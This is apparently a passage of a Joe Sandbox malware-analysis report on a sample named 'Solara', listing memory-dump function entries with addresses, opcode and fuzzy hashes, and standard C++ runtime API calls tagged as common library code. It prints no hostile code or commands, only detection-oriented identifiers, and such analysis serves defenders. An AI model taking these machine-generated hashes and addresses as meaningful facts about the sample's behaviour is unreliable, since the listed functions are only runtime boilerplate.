Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 12a1d01d644e1ea6623e725fdce3b581c549e5e14f99fc8fb603ce0e393091b4
Instruction ID: 105c0ccc54d34843875e03ffb482cd2645a76024a2d5f701af30612b49e26ccc
Opcode Fuzzy Hash: 12a1d01d644e1ea6623e725fdce3b581c549e5e14f99fc8fb603ce0e393091b4
Instruction Fuzzy Hash: BB11D371900235ABCF04FB68E802BAE77B5EF84714F244009F915AB781DF709E42A7A1

Function 00C549C8 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C549BF,00C50FAE,00C4FF4B), ref: 00C549D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C549E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C549FD
SetLastError.KERNEL32(00000000,00C549BF,00C50FAE,00C4FF4B), ref: 00C54A4F

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0a76b9260355dd97975409c02e99d907a916f8d7194bfc902c9605540d97251a
Instruction ID: 0af76ea86f0450442438e6e6ebf86636291a43c112ec9e4d380f7149dc07c31d
Opcode Fuzzy Hash: 0a76b9260355dd97975409c02e99d907a916f8d7194bfc902c9605540d97251a
Instruction Fuzzy Hash: C301D83A1083116EA7792BF47CC5B2F2A56EB4177BF200329F925860E1EF214DC9B14D

Function 00C4A3D7 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A3DE
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A3E8
int.LIBCPMT ref: 00C4A3FF

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A439
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A459
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A466

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: afebd920092796c9420e349ed46318ca2dc185c9322ea75b28bd210f81914635
Instruction ID: 75e42de0bfa8d08e238eb5fae5bc75252c291d1b246f737ff65342961a8e0b4e
Opcode Fuzzy Hash: afebd920092796c9420e349ed46318ca2dc185c9322ea75b28bd210f81914635
Instruction Fuzzy Hash: 4A0126358002259BCB05EBA0E816AAD7772FF80320F184108F911A7391CF709E42D791

Function 00C4A596 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A59D
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A5A7
int.LIBCPMT ref: 00C4A5BE

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A5F8
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A618
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A625

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: edda6433ac532a5ea1ffaec79dddeda1a0dae4f19afe27a09126a6d0e3afaaaf
Instruction ID: 8298d5399550dbf011041afa917a7bd8b88ccd8aa7f389be6cbd9fa70c57565c
Opcode Fuzzy Hash: edda6433ac532a5ea1ffaec79dddeda1a0dae4f19afe27a09126a6d0e3afaaaf
Instruction Fuzzy Hash: 1601F9359002269FCF05FBA4E856AFEB772BF84314F194008F910AB391DF349E069792

Function 00C4A501 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A508
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A512
int.LIBCPMT ref: 00C4A529

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A563
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A583
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A590

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 3c0da4356b171eeca44b64c812929e65800bb57f7cafb9ed35fd705fd3eaa38e
Instruction ID: 224e7c839fee6b85800d88ed61d0d4efb4ef7b7d5e6cfa3665664c51c75ae9ac
Opcode Fuzzy Hash: 3c0da4356b171eeca44b64c812929e65800bb57f7cafb9ed35fd705fd3eaa38e
Instruction Fuzzy Hash: 8801D2359002259BCB05EBA4E812BEE77B2BF84324F140508E910AB791DF349E0197A5

Function 00C3C6B0 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C6B7
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C6C1
int.LIBCPMT ref: 00C3C6D8

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C712
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C732
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C73F

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 19d817aa5cafaaa2e716dd61e90763f07d3bc0c1dae9a259cfc2ff5a16248ce8
Instruction ID: 16a6ab4a0c470d720dc1d494f971d965a5d476e06544d813320866d35aad26d6
Opcode Fuzzy Hash: 19d817aa5cafaaa2e716dd61e90763f07d3bc0c1dae9a259cfc2ff5a16248ce8
Instruction Fuzzy Hash: D201D6359102269BCF05FBA4E852AFD7772AF85310F144008F911A7391CF309E429B90

Function 00C3C61B Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C622
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C62C
int.LIBCPMT ref: 00C3C643

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C67D
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C69D
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C6AA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: bcafe41d31739b32c2d6c6ff8be9d6f55bb9bb6ebccdb93fe9945e9fb1f4a531
Instruction ID: 211f74b5554b8a531b478209596a10e9001c842c8c0812e239a2b92c5743b64c
Opcode Fuzzy Hash: bcafe41d31739b32c2d6c6ff8be9d6f55bb9bb6ebccdb93fe9945e9fb1f4a531
Instruction Fuzzy Hash: B601D2359102269BCF04FB64E856AED77B2AF84320F284008F911AB392CF709E429B91

Function 00C4A7EA Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A7F1
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A7FB
int.LIBCPMT ref: 00C4A812

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A84C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A86C
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A879

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 903a063b246025a6161f0bd731f808918c73ec6347db9f5cb7ee2ed866500ccd
Instruction ID: 2c2fb20069a44ffdce32d7e6a87fc909a42d9098849464215bf18637c8742825
Opcode Fuzzy Hash: 903a063b246025a6161f0bd731f808918c73ec6347db9f5cb7ee2ed866500ccd
Instruction Fuzzy Hash: 2001C035D4022A9BCB04EBA4E812AFE77B2FF84310F140008E911AB3D1CF309A46D792

Function 00C3C745 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C74C
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C756
int.LIBCPMT ref: 00C3C76D

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C7A7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C7C7
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C7D4

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 38827ae5a1478071991cd0687b68572e1eb9142daa1c65416eaf7ddd560e2801
Instruction ID: cd049dab87bdd3b20d6d80f9d4527a6f2302c39567ff945f6fc4f3ba01b214b0
Opcode Fuzzy Hash: 38827ae5a1478071991cd0687b68572e1eb9142daa1c65416eaf7ddd560e2801
Instruction Fuzzy Hash: 8E01D23690022AABCF05FBA4E855AFDB7B5AF85724F144008FA11AB7D1CF309E419B90

Function 00C4A755 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A75C
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A766
int.LIBCPMT ref: 00C4A77D

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A7B7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A7D7
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A7E4

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: f9813541688dec58828b8b0e0dc6727d7b7e6d86ddf420b2a5f1b41c2cc163b5
Instruction ID: 75045e0cc933e8b44e04a59ef81bcd5fbb89d427d6bd8c7e6714b1b7c8523d0f
Opcode Fuzzy Hash: f9813541688dec58828b8b0e0dc6727d7b7e6d86ddf420b2a5f1b41c2cc163b5
Instruction Fuzzy Hash: 3301D6359402299BCF05FBA4E816AAE77B1BF84320F140409F910A7791DF349E45E791

Function 00C3C999 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C9A0
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C9AA
int.LIBCPMT ref: 00C3C9C1

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3C9FB
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CA1B
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CA28

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4c16639695510467d6cefff2f843cdaae3510fea3b8fc8b86cd8c8ed38123a65
Instruction ID: 4e47876e4acf3a1822e290e000dacc9606fcdfb8eeb3bddf602a2fc12e6ce1fc
Opcode Fuzzy Hash: 4c16639695510467d6cefff2f843cdaae3510fea3b8fc8b86cd8c8ed38123a65
Instruction Fuzzy Hash: 0601263690022A9BCB04FBA0E845BAD77B1AF80310F154108F910B7381CF349E01AB90

Function 00C3CAC3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CACA
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CAD4
int.LIBCPMT ref: 00C3CAEB

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CB25
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CB45
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CB52

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 52b8282cd5b4b42e41541fc874e01fdcc9c8bf15883a0785852254253426e136
Instruction ID: 5e2a5f76e2ab9f977fe2e7bcf4eeb0e0f58e740153fd7b5f08a590f1a02bd57f
Opcode Fuzzy Hash: 52b8282cd5b4b42e41541fc874e01fdcc9c8bf15883a0785852254253426e136
Instruction Fuzzy Hash: CA01D275D002259BCB04EB64E852AFEB771BF84314F144508F921AB791CF34AE42E791

Function 00C3CA2E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CA35
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CA3F
int.LIBCPMT ref: 00C3CA56

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CA90
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CAB0
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CABD

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: f9501568190ef6dfc6f8603c490bd9ec6611a653cc4a78f722824be6fbe86513
Instruction ID: 8769b54b2fff6868a6b41ba997a7abb98749837021510a098d9fa89f9866c277
Opcode Fuzzy Hash: f9501568190ef6dfc6f8603c490bd9ec6611a653cc4a78f722824be6fbe86513
Instruction Fuzzy Hash: DC01D239D10229ABCF04EBA4E855AAEB771AF85314F144409F911AB391DF309E42AB90

Function 00C3CB58 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CB5F
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CB69
int.LIBCPMT ref: 00C3CB80

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CBBA
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CBDA
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CBE7

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 14815eacfeea516c2c5d98a07a6a78aa7be438becce43198a99f931f175db6bc
Instruction ID: 28ba70a3c93e63436688471ebbd0bc1f58e8de9b7b24fe900510fa86616c92be
Opcode Fuzzy Hash: 14815eacfeea516c2c5d98a07a6a78aa7be438becce43198a99f931f175db6bc
Instruction Fuzzy Hash: EA01D235910225ABCB05EBA4E856AFEB7B1BF84314F144408FA11BB791CF309E42DB90

Function 00C3CED6 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CEDD
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CEE7
int.LIBCPMT ref: 00C3CEFE

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CF38
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CF58
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CF65

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: acab36eaac13cee5cdf4b89eaf4b393caa45e92f45694ac4e1c0552195f9bec0
Instruction ID: b8f4731887308c0e708adfb02048106a25fc37a447889111aaf3908678570f29
Opcode Fuzzy Hash: acab36eaac13cee5cdf4b89eaf4b393caa45e92f45694ac4e1c0552195f9bec0
